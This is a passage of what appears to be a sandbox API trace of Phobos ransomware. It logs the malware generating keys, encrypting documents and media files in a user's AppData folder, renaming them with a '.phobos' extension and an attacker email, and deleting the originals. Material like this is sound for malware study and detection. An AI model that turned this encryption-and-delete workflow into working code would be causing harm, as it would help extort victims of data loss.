WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.279] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.279] CloseHandle (hObject=0x164) returned 1 [0193.279] CloseHandle (hObject=0x194) returned 1 [0193.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp")) returned 1 [0193.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.281] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=69832) returned 1 [0193.281] CloseHandle (hObject=0x194) returned 1 [0193.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx")) returned 0x2020 [0193.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.281] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.281] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.282] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.282] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x110c8, lpOverlapped=0x0) returned 1 [0193.283] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110d0, dwBufLen=0x110d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110d0) returned 1 [0193.284] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110d0, lpOverlapped=0x0) returned 1 [0193.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.285] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.285] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0193.285] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.285] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0193.285] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.285] CloseHandle (hObject=0x194) returned 1 [0193.285] CloseHandle (hObject=0x164) returned 1 [0193.285] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IQCk1WOIKqKA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iqck1woikqka.xlsx")) returned 1 [0193.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.287] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=94779) returned 1 [0193.287] CloseHandle (hObject=0x164) returned 1 [0193.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a")) returned 0x2020 [0193.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.288] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.288] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.288] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.288] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1723b, lpOverlapped=0x0) returned 1 [0193.290] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17240, dwBufLen=0x17240 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17240) returned 1 [0193.291] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x17240, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x17240, lpOverlapped=0x0) returned 1 [0193.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.293] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.293] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.293] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.293] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.293] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.293] CloseHandle (hObject=0x164) returned 1 [0193.293] CloseHandle (hObject=0x194) returned 1 [0193.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J_CmiP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j_cmip.m4a")) returned 1 [0193.294] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.295] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=18200) returned 1 [0193.295] CloseHandle (hObject=0x194) returned 1 [0193.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3")) returned 0x2020 [0193.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.295] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.295] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.296] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.296] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4718, lpOverlapped=0x0) returned 1 [0193.297] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4720, dwBufLen=0x4720 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4720) returned 1 [0193.297] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4720, lpOverlapped=0x0) returned 1 [0193.298] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.298] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.298] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.298] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.298] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.298] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.298] CloseHandle (hObject=0x194) returned 1 [0193.299] CloseHandle (hObject=0x164) returned 1 [0193.299] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kifyX0ZlBX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kifyx0zlbx.mp3")) returned 1 [0193.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.300] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=46064) returned 1 [0193.300] CloseHandle (hObject=0x164) returned 1 [0193.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx")) returned 0x2020 [0193.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.301] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.301] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.301] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.301] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3f0, lpOverlapped=0x0) returned 1 [0193.303] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb400, dwBufLen=0xb400 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb400) returned 1 [0193.303] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb400, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb400, lpOverlapped=0x0) returned 1 [0193.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.304] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.304] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0193.304] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.304] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0193.305] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.305] CloseHandle (hObject=0x164) returned 1 [0193.305] CloseHandle (hObject=0x194) returned 1 [0193.305] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ktT xIdVRRvSjlr_RcuY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ktt xidvrrvsjlr_rcuy.xlsx")) returned 1 [0193.306] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.306] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=70725) returned 1 [0193.307] CloseHandle (hObject=0x194) returned 1 [0193.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx")) returned 0x2020 [0193.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.307] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.307] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.312] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.312] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11445, lpOverlapped=0x0) returned 1 [0193.313] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11450, dwBufLen=0x11450 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11450) returned 1 [0193.313] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x11450, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x11450, lpOverlapped=0x0) returned 1 [0193.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.315] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.315] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0193.315] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.315] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0193.315] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.315] CloseHandle (hObject=0x194) returned 1 [0193.315] CloseHandle (hObject=0x164) returned 1 [0193.315] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LpkaXf84Y3y05eg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lpkaxf84y3y05eg.xlsx")) returned 1 [0193.316] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.317] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=221) returned 1 [0193.317] CloseHandle (hObject=0x164) returned 1 [0193.317] GetFileAttributesW 